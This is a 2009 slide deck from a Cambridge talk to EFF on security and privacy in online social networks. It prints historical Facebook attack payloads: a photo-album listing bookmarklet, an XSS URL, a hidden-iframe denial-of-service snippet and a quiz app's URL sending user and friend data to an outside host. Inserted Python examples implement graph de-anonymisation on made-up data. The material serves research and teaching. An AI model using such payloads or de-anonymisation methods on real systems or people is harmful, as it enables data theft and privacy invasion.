[Slide 1]
Security & Privacy in Online Social Networks
Presentation to EFF, Dec 21, 2009
Joseph Bonneau, Computer Laboratory
[Slide 2]
Hack #1a: PHP Photo Parameter Forging
Photo Exploits: PHP parameter fiddling (Ng, 2008)
[Slide 3]
Hack #1b: CDN Photo URL Forging
Photo Exploits: Content Delivery Network URL fiddling
[Slide 4]
Hack #1c: JS Photo Album listing
[Slide 5]
Hack #1c: JS Photo Album listing
JavaScript addition:
javascript:(function(){function y(){if(x.readyState==4){q=x.responseText.substring(9);p=eval('('+q+')');document.getElementById('tab_canvas').innerHTML=p.payload.tab_content;}}x=window.XMLHttpRequest?new window.XMLHttpRequest:(window.ActiveXObject?new ActiveXObject("MSXML2.XMLHTTP"):null);x.onreadystatechange=y;x.open('POST','http://www.facebook.com/ajax/profile/tab.php',true);x.send('id='+ProfileURIController._profileId+'&v=photos&__a=1');})()
[Slide 6]
Hack #1c: JS Photo Album listing
[Slide 7]
Overview
I. The Social Network Ecosystem
II. Security
III. Privacy
IV. The Future
[Slide 8]
A Brief History
• SixDegrees.com, 1997
• Friendster, 2002
• MySpace, 2003
• Facebook, 2004
• Twitter, 2006
• Definitive account: danah boyd and Nicole Ellison “Social Network Sites: Definition, History, and Scholarship,” 2007
[Slide 9]
Exponential Growth
[Slide 10]
Global Players (4/2009)
Credit: Vincenzo Cosenza
[Slide 11]
What's Unique About Social Networks?
Just LAMP websites where you list your friends...
[Slide 12]
What's Unique About Social Networks?
Firehose of user data
[Slide 13]
What's Unique About Social Networks?
Facebook Applications
[Slide 14]
What's Unique About Social Networks?
Facebook Connect
[Slide 15]
Web 2.0?

| Function | Internet version | Facebook version |
|---|---|---|
| Page Markup | HTML, JavaScript | FBML |
| DB Queries | SQL | FBQL |
| Email | SMTP | FB Mail |
| Forums | Usenet, etc. | FB Groups |
| Instant Messages | XMPP | FB Chat |
| News Streams | RSS | FB Stream |
| Authentication | OpenID | FB Connect |
| Photo Sharing | Flickr, etc. | FB Photos |
| Video Sharing | YouTube, etc. | FB Video |
| Blogging | Blogger, etc. | FB Notes |
| Microblogging | Twitter, etc. | FB Status Updates |
| Micropayment | Peppercoin, etc. | FB Points |
| Event Planning | E-Vite | FB Events |
| Classified Ads | craigslist | FB Marketplace |
[Slide 16]
Parallel Trend: The Addition of Social Context
“Given sufficient funding, all web sites expand in functionality until users can add each other as friends”
[Slide 17]
Facebook is the SNS that Matters
Dominant
− Largest and fastest-growing
− Most internationally successful
− Receives most media attention
Advanced
− Largest feature-set
− Most complex privacy model
− Closest representation of real-life social world
[Slide 18]
Hack #2: Facebook XSS
http://www.facebook.com/connect/prompt_permissions.php?ext_perm=read_stream
Credit: theharmonyguy
[Slide 19]
Hack #2: Facebook XSS
http://www.facebook.com/connect/prompt_permissions.php?ext_perm=1
Credit: theharmonyguy
[Slide 20]
Hack #2: Facebook XSS
http://www.facebook.com/connect/prompt_permissions.php?ext_perm=%3Cscript%3Ealert(document.getElementById(%22post_form_id%22).value);%3C/script%3E
Credit: theharmonyguy
[Slide 21]
Overview
I. The Social Network Ecosystem
II. Security
III. Privacy
IV. The Future
[Slide 22]
SNS Threat Model
[Slide 23]
SNS Threat Model
Account compromise
− Email or SNS (practically the same)
Computer compromise
Monetary Fraud
− Increasingly becoming a payment platform
Service denial/mischief
[Slide 24]
Web 2.0?

| Function | Internet version | Facebook version |
|---|---|---|
| Page Markup | HTML, JavaScript | FBML |
| DB Queries | SQL | FBQL |
| Email | SMTP | FB Mail |
| Forums | Usenet, etc. | FB Groups |
| Instant Messages | XMPP | FB Chat |
| News Streams | RSS | FB Stream |
| Authentication | OpenID | FB Connect |
| Photo Sharing | Flickr, etc. | FB Photos |
| Video Sharing | YouTube, etc. | FB Video |
| Blogging | Blogger, etc. | FB Notes |
| Microblogging | Twitter, etc. | FB Status Updates |
| Micropayment | Peppercoin, etc. | FB Points |
| Event Planning | E-Vite | FB Events |
| Classified Ads | craigslist | FB Marketplace |
[Slide 25]
The Downside of Re-inventing the Internet
SNSs repeating all of the web's security problems
− Phishing
− Spam
− 419 Scams & Fraud
− Identity Theft/Impersonation
− Malware
− Cross-site Scripting
− Click-Fraud
− Stalking, Harassment, Bullying, Blackmail
[Slide 26]
Phishing
Genuine Facebook emails
[Slide 27]
Phishing
Phishing attempt, April 30, 2009
[Slide 28]
Self-propagating Worms
Koobface worm, launched August 2008
[Slide 29]
Self-propagating Worms
Koobface worm, launched August 2008
[Slide 30]
Self-propagating Worms
[Slide 31]
Password Sharing
[Slide 32]
Spam
[Slide 33]
Scams
Calvin: hey
Evan: holy moly. what's up man?
Calvin: i need your help urgently
Evan: yes sir
Calvin: am stuck here in london
Evan: stuck?
Calvin: yes i came here for a vacation
Calvin: on my process coming back home i was robbed inside the hotel i loged in
Evan: ok so what do you need
Calvin: can you loan me $900 to get a return ticket back home and pay my hotel bills
Evan: how do you want me to loan it to you?
Calvin: you can have the money send via western union
[Slide 34]
Botnet Command & Control
Twitterbot, August 2009
[Slide 35]
SNS-hosted botnet
Idea: add malicious JavaScript payload to a popular application
Example: Denial of Service:
<iframe name="1" style="border: 0px none #ffffff; width: 0px; height: 0px;"
src="http://victim-host/image1.jpg"></iframe><br/>
“Facebot” - Elias Athanasopoulos, A. Makridakis, D. Antoniades, S. Antonatos, Sotiris Ioannidis, K. G. Anagnostakis and Evangelos P. Markatos, “Antisocial Networks: Turning a Social Network into a Botnet,” 2008.
[Slide 36]
Common Trends
Social channels increase susceptibility to scams
− Personal information also aids greatly in targeted attacks
Fundamental issue: SNS environment leads to carelessness
− Rapid, erratic browsing
− Applications installed with little scrutiny
− Fun, noisy, unpredictable environment
− People use SNS with their brain turned off
[Slide 37]
Common Trends
• Centralisation helps in prevention
− Complete control of messaging platform, blocking, revocation
• Social Context also useful
− Can develop strong IDS
− Analyse link structure, profiles, behavior logs
[Slide 38]
Web Hacking
Most SNS have a poor security track record
− Rapid growth
− Complicated site design
− Many feature interactions
Third party apps even worse (“Month of Facebook Bugs”)
Lack of attention to security
− Over half of sites failing even to deploy TLS properly!
[Slide 39]
FBML Translation
Facebook Markup Language
Result: arbitrary JavaScript execution (Felt, 2007)
Translated into HTML:
[Slide 40]
Facebook Query Language
Facebook Query Language Exploits (Bonneau, Anderson, Danezis, 2009)
[Slide 41]
Hack #3: Facebook XSRF/Automatic Authentication
Credit: Ronan Zilberman
[Slide 42]
Overview
I. The Social Network Ecosystem
II. Security
III. Privacy
IV. The Future
[Slide 43]
Data of Interest
[Slide 44]
Data of Interest
Profile Data
− Loads of PII (contact info, address, DOB)
− Tastes, preferences
Graph Data
− Friendship connections
− Common group membership
− Communication patterns
Activity Data
− Time, frequency of log-in, typical behavior
[Slide 45]
Major Privacy Problems
Data is shared in ways that most users don't expect
“Contextual integrity” not maintained
Three main drivers:
− Poor implementation
− Misaligned incentives & economic pressure
− Indirect information leakage
[Slide 46]
Poor Implementation
[Slide 47]
Poor Implementation
Orkut Photo Tagging
[Slide 48]
Poor Implementation
Facebook Connect
[Slide 49]
Poor Implementation
− Applications given full access to profile data of installed users
− Even less revenue available for application developers...
[Slide 50]
Hack #4: Application Data Theft
What happens when you take a quiz...
[Slide 51]
Hack #4: Application Data Theft
Facebook Application Architecture
[Slide 52]
Hack #4: Application Data Theft
URL for banner ad
http://sochr.com/i.php&name=[Joseph Bonneau]&nx=[My User ID]&age=[My DOB]&gender=[My Gender]&pic=[My Photo URL]&fname0=[Friend #1 Name 1]&fname1=[Friend #2 Name]&fname2=[Friend #3 Name]&fname3=[Friend #4 Name]&fpic0=[Friend #1 Photo URL]&fpic0=[Friend #2 Photo URL]&fpic0=[Friend #3 Photo URL]&fpic0=[Friend #4 Photo URL]&fb_session_params=[All of the quiz application's session parameters]
[Slide 53]
Hack #4: Application Data Theft
Query made by banner ad through user's browser
SELECT uid, birthday, current_location, sex, first_name, name, pic_square, relationship_status FROM user WHERE uid IN (SELECT uid2 FROM friend WHERE uid1 = '[current user id]') AND strlen(pic) > 0 ORDER BY rand() LIMIT 500
[Slide 54]
Hack #4: Application Data Theft
What the user sees...
[Slide 55]
Terms of Service
Terms of Service, hi5:
[Slide 56]
Economic Pressure
Major survey of 45 social networks' privacy practices
Key Conclusions:
− “Market for privacy” fundamentally broken
− Huge network effects, lock-in, lemons market
− Sites with better privacy less likely to mention it!
− Privacy Salience
[Slide 57]
Promotional Techniques
[Slide 58]
Promotional Techniques
[Slide 59]
The Push for Openness...
[Slide 60]
Information leaked by the Social Graph...
[Slide 61]
“Traditional” Social Network Analysis
• Performed by sociologists, anthropologists, etc. since the 70's
• Use data carefully collected through interviews & observation
• Typically < 100 nodes
• Complete knowledge
• Links have consistent meaning
• All of these assumptions fail badly for online social network data
[Slide 62]
Traditional Graph Theory
• Nice Proofs
• Tons of definitions
• Ignored topics:
• Large graphs
• Sampling
• Uncertainty
[Slide 63]
Models Of Complex Networks From Math & Physics
Many nice models
• Erdos-Renyi
• Watts-Strogatz
• Barabasi-Albert
Social Networks properties:
• Power-law
• Small-world
• High clustering coefficient
[Slide 64]
Real social graphs are complicated!
[Slide 65]
When In Doubt, Compute!
We do know many graph algorithms:
• Find important nodes
• Identify communities
• Train classifiers
• Identify anomalous connections
Major Privacy Implications!
[Slide 66]
Privacy Questions
• What can we infer purely from link structure?
[Slide 67]
Privacy Questions
• What can we infer purely from link structure?
A surprising amount!
• Popularity
• Centrality
• Introvert vs. Extrovert
• Leadership potential
• Communities
[Slide 68]
Privacy Questions
• If we know nothing about a node but its neighbours, what can we infer?
[Slide 69]
Privacy Questions
• If we know nothing about a node but its neighbours, what can we infer?
A lot!
• Sexual Orientation
• Gender
• Political Beliefs
• Location
• Breed?
[Slide 70]
Privacy Questions
• Can we anonymise graphs?
[Slide 71]
Privacy Questions
• Can we anonymise graphs?
Not easily...
• Seminal result by Backstrom et al.: Active attack needs just 7 nodes
• Can do even better given user's complete neighborhood
• Also results for correlating users across networks
• Developing line of research...
[Slide 72]
De-anonymisation (active)
[Figure: social graph on nodes A to I]
A Social Graph with Private Links
[Slide 73]
De-anonymisation (active)
[Figure: the same graph with attacker nodes 1 to 5 added]
Attacker adds k nodes with random edges
[Slide 74]
De-anonymisation (active)
[Figure: attacker nodes 1 to 5 now also linked to the targeted nodes H and G]
Attacker links to targeted nodes
[Slide 75]
De-anonymisation (active)
Graph is anonymised and edges are released
[Slide 76]
De-anonymisation (active)
[Figure: released anonymised graph with the attacker's nodes 1 to 5 picked out]
Attacker searches for unique k-subgroup
[Slide 77]
De-anonymisation (active)
[Figure: attacker nodes 1 to 5 located; H and G identified through their links to them]
Link between targeted nodes is confirmed
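As an added worked example (not from the slides or from the Backstrom et al. paper), the Python below replays the four steps above on a constructed graph that reuses the figure's node names, and shows the publisher's side of the lesson: relabelling nodes does nothing against a pattern planted before release, and a structural look-alike is only weeded out by the fingerprint check. The sybil pattern, the fingerprints and the shuffle seed are assumptions.

```python
"""Toy replay of the active attack above (Backstrom, Dwork, Kleinberg 2007).
Constructed data: the 9-node graph reuses the figure's node names; sybil
pattern, fingerprints and the seed are assumptions for illustration."""
import itertools
import random
from collections import defaultdict

# Constructed social graph; G-H is the private link the attacker wants.
ORIGINAL_EDGES = [("A", "B"), ("A", "C"), ("B", "C"), ("C", "D"), ("D", "E"),
                  ("D", "G"), ("E", "F"), ("F", "I"), ("G", "H"), ("H", "I")]
# k = 6 sybils wired as the smallest asymmetric graph, so the pattern has
# no non-trivial automorphism and cannot be matched to itself two ways.
SYBILS = ["S1", "S2", "S3", "S4", "S5", "S6"]
SYBIL_EDGES = [("S1", "S2"), ("S2", "S3"), ("S3", "S4"),
               ("S4", "S5"), ("S3", "S6"), ("S4", "S6")]
# Each targeted user is befriended by a distinct non-empty subset of sybils.
FINGERPRINTS = {"G": {"S1"}, "H": {"S2", "S5"}, "E": {"S6"}}

def build_adjacency(edges):
    adj = defaultdict(set)
    for u, v in edges:
        adj[u].add(v)
        adj[v].add(u)
    return adj

def plant_sybils():
    """Steps 1-2: the graph once sybils exist and have befriended the targets."""
    edges = list(ORIGINAL_EDGES) + list(SYBIL_EDGES)
    for target, roles in FINGERPRINTS.items():
        edges += [(target, s) for s in sorted(roles)]
    return edges

def anonymise(edges, seed=7):
    """Step 3: publisher swaps names for random integers and releases edges.
    The secret name->id map is returned only so the result can be checked."""
    nodes = sorted({n for edge in edges for n in edge})
    ids = list(range(len(nodes)))
    random.Random(seed).shuffle(ids)
    secret = dict(zip(nodes, ids))
    return [(secret[u], secret[v]) for u, v in edges], secret

def find_sybil_embeddings(adj):
    """Step 4a: backtracking search for every node set whose degrees and
    induced edges equal the planted pattern (degree = internal + fingerprint)."""
    pattern = build_adjacency(SYBIL_EDGES)
    degree = {s: len(pattern[s]) + sum(s in fp for fp in FINGERPRINTS.values())
              for s in SYBILS}
    found = []

    def extend(i, mapping):
        if i == len(SYBILS):
            found.append(dict(mapping))
            return
        role = SYBILS[i]
        for node in sorted(adj):
            if node in mapping.values() or len(adj[node]) != degree[role]:
                continue
            if all((mapping[r] in adj[node]) == (r in pattern[role])
                   for r in SYBILS[:i]):
                mapping[role] = node
                extend(i + 1, mapping)
                del mapping[role]

    extend(0, {})
    return found

def confirm_by_fingerprints(embedding, adj):
    """Step 4b: accept an embedding only if the outside nodes touching it carry
    exactly the planted fingerprints; returns {target name: released id}."""
    placed = set(embedding.values())
    touched = defaultdict(set)
    for role, node in embedding.items():
        for nbr in adj[node] - placed:
            touched[nbr].add(role)
    wanted = {frozenset(fp): t for t, fp in FINGERPRINTS.items()}
    if len(touched) != len(wanted) or {frozenset(r) for r in touched.values()} != set(wanted):
        return None
    return {wanted[frozenset(r)]: nbr for nbr, r in touched.items()}

def run_attack(seed=7):
    """Returns (learned links, number of structural look-alikes, secret map,
    located targets).  Only one look-alike survives the fingerprint check."""
    released, secret = anonymise(plant_sybils(), seed)
    adj = build_adjacency(released)
    embeddings = find_sybil_embeddings(adj)
    located = [m for m in (confirm_by_fingerprints(e, adj) for e in embeddings) if m]
    (targets,) = located  # unpacking fails loudly unless exactly one survives
    links = {(a, b): targets[b] in adj[targets[a]]
             for a, b in itertools.combinations(sorted(targets), 2)}
    return links, len(embeddings), secret, targets
```

On this data the search finds two node sets with the right degrees and internal edges (target E and its neighbour F mimic one sybil pair), and the fingerprint check discards the impostor before the G-H link is read off.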
[Slide 78]
De-anonymisation (passive)
• Similar to above, except k normal users collude and share their links
• Only compromise random targets
[Slide 79]
De-anonymisation results
• 7 nodes need to be created in active attack
• De-anonymize 70 chosen nodes!
• 7 nodes in passive coalition compromise ~ 10 random nodes
[Slide 80]
Cross-graph De-anonymisation
• Goal: identify users in a private graph by mapping to public graph
• “Shouldn't” work: graph isomorphism isn't thought to be in P
• Works quite well in practice on real graphs!
[Slide 81]
Cross-graph De-anonymisation
Public Graph / Private Graph
[Slide 82]
Cross-graph De-anonymisation
[Figure: public graph nodes A, B, C matched to private graph nodes A', B', C']
Public Graph / Private Graph
Step 1: Identify Seed Nodes
[Slide 83]
Cross-graph De-anonymisation
[Figure: D is mapped to D' because its already-mapped neighbours line up]
Public Graph / Private Graph
Step 2: Assign mappings based on mapped neighbors
[Slide 84]
Cross-graph De-anonymisation
[Figure: E is mapped to E' in the next round]
Public Graph / Private Graph
Step 3: Iterate
[Slide 85]
Cross-graph De-anonymisation
• Demonstrated on Twitter and Flickr
• Only 24% of Twitter users on Flickr, 5% of Flickr users on Twitter
• 31% of common users identified (~9,000) given just 30 seeds!
• Real-world attacks can be much more powerful
• Auxiliary knowledge
• Mapping of attributes, language use, etc.
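Added example, not from the slides or from Narayanan and Shmatikov's own code: a minimal seed-and-propagate matcher for the three steps above, run over two constructed graphs, one carrying public names and one carrying only numeric ids, with the reverse check that rejects one-sided matches. The edge lists, the three seeds and the deliberately unmatched nodes (X exists only in the public graph, 108 only in the private one) are assumptions.

```python
"""Toy version of cross-graph de-anonymisation by seed-and-propagate
(Narayanan and Shmatikov, 2009).  Both graphs are constructed; the overlap
is imperfect on purpose: one edge is missing from the private graph and
each side has one node without a counterpart."""
from collections import defaultdict

PUBLIC_EDGES = [("A", "B"), ("B", "C"), ("A", "C"), ("A", "D"), ("B", "D"),
                ("C", "E"), ("D", "E"), ("E", "F"), ("D", "F"), ("F", "G"),
                ("E", "G"), ("E", "X")]            # X: public-only user
PRIVATE_EDGES = [(101, 102), (102, 103), (101, 103), (101, 104), (102, 104),
                 (103, 105), (104, 105), (105, 106), (104, 106), (106, 107),
                 (107, 108)]                       # E-G dropped; 108 private-only
SEEDS = {101: "A", 102: "B", 103: "C"}            # step 1: seed nodes known a priori

def build_adjacency(edges):
    adj = defaultdict(set)
    for u, v in edges:
        adj[u].add(v)
        adj[v].add(u)
    return adj

def best_match(node, adj_from, adj_to, mapping, taken):
    """Score every unmapped node of the other graph by how many of `node`'s
    already-mapped neighbours land on one of its neighbours.  Return the
    winner only if it is unique and scores at least 1, otherwise None."""
    images = {mapping[n] for n in adj_from[node] if n in mapping}
    scores = {cand: len(images & adj_to[cand]) for cand in adj_to if cand not in taken}
    ranked = sorted(scores.values(), reverse=True)
    if not ranked or ranked[0] < 1 or (len(ranked) > 1 and ranked[0] == ranked[1]):
        return None
    return max(scores, key=scores.get)

def propagate(public_edges, private_edges, seeds):
    """Steps 2-3: grow the seed mapping (private id -> public name) until no
    confident match is left.  Unmatched nodes simply stay out of the mapping."""
    pub, priv = build_adjacency(public_edges), build_adjacency(private_edges)
    mapping = dict(seeds)
    changed = True
    while changed:
        changed = False
        for v in sorted(priv):
            if v in mapping:
                continue
            u = best_match(v, priv, pub, mapping, set(mapping.values()))
            if u is None:
                continue
            # Reverse check: scoring from the public side must point back at v.
            inverse = {name: pid for pid, name in mapping.items()}
            if best_match(u, pub, priv, inverse, set(mapping)) == v:
                mapping[v] = u
                changed = True
    return mapping
```

With three seeds the matcher recovers the other four shared users in one pass; 108 and X never reach a score above zero and stay unmatched, which is the honest outcome for users present on only one network.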
[Slide 86]
Privacy Questions
• What can we infer if we “compromise” a fraction of nodes?
[Slide 87]
Privacy Questions
• What can we infer if we “compromise” a fraction of nodes?
A lot...
• Common theme: small groups of nodes can see the rest
• Danezis et al.
• Nagaraja
• Korolova et al.
• Bonneau et al.
[Slide 88]
Privacy Questions
• What if we get a subset of neighbours for all nodes?
[Slide 89]
Privacy Questions
• What if we get a subset of k neighbours for all nodes?
• Can still approximate most functions of the graph
• Bonneau et al.
• Danezis et al.
• Nagaraja
[Slide 90]
Overview
I. The Social Network Ecosystem
II. Security
III. Privacy
IV. The Future
[Slide 91]
Questions for the future
• How will SNS make money?
• Banner Advertising
• Brand management
• Real-time search/Open-source intelligence
• Subscription/“freemium”
[Slide 92]
Questions for the future
• How will long-term SNS be architected?
• Proprietary walled-garden
• Commercial, with open standards
• De-centralized
[Slide 93]
Questions for the future
• How will third-party developers be policed?
• Technical limitations
• Policing
• Reputation
[Slide 94]
Questions for the future
• Who will regulate SNS?
• Self-regulation
• Government
• Some interest from Canadian PC, Spain, Germany, ENISA, FTC
• User Democracy?
• Non-profits/academics
• EFF and friends :-)
[Slide 95]
My Reading List
• http://www.cl.cam.ac.uk/~jcb82/sns_bib/main.html
• Questions?